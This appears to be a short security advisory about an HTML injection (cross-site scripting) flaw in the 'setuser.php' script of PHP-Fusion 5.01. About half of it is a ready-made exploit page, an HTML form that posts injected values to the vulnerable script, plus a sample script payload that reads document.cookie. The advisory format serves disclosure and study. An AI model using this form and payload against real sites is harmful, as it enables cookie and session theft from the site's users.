source: https://www.securityfocus.com/bid/12853/info
PHP-Fusion is reportedly affected by a HTML injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input passed to the 'setuser.php' script before using it in dynamically generated content.
This vulnerability is reported to affect PHP-Fusion version 5.01, however the vendor reports that the vulnerability might exist in an alteration that is planned for version 5.02. This alteration was recently released to the PHP-Fusion community as a mod for version 5.01.
<html>
<head>
<title>PHP-Fusion v5.01 Exploit</title>
</head>
<body>
<h1>PHP-Fusion v5.01 Html Injection Exploit</h1>
<form method="POST" action="http://www.example.com/setuser.php">
<b>XSS in register.php:</b><p>
Username:
<input type="text" name="user_name" size="48" value="XSS Injection Code"></p>
<p>
Password:
<input type="text" name="user_pass" size="48" value="XSS Injection Code"></p>
<p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br>
exmple: <script>document.write(document.cookie)</script></p>
<p> <input type='submit' name='login' value='RUN!' class='button'></p>
</form>
<p> </p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>
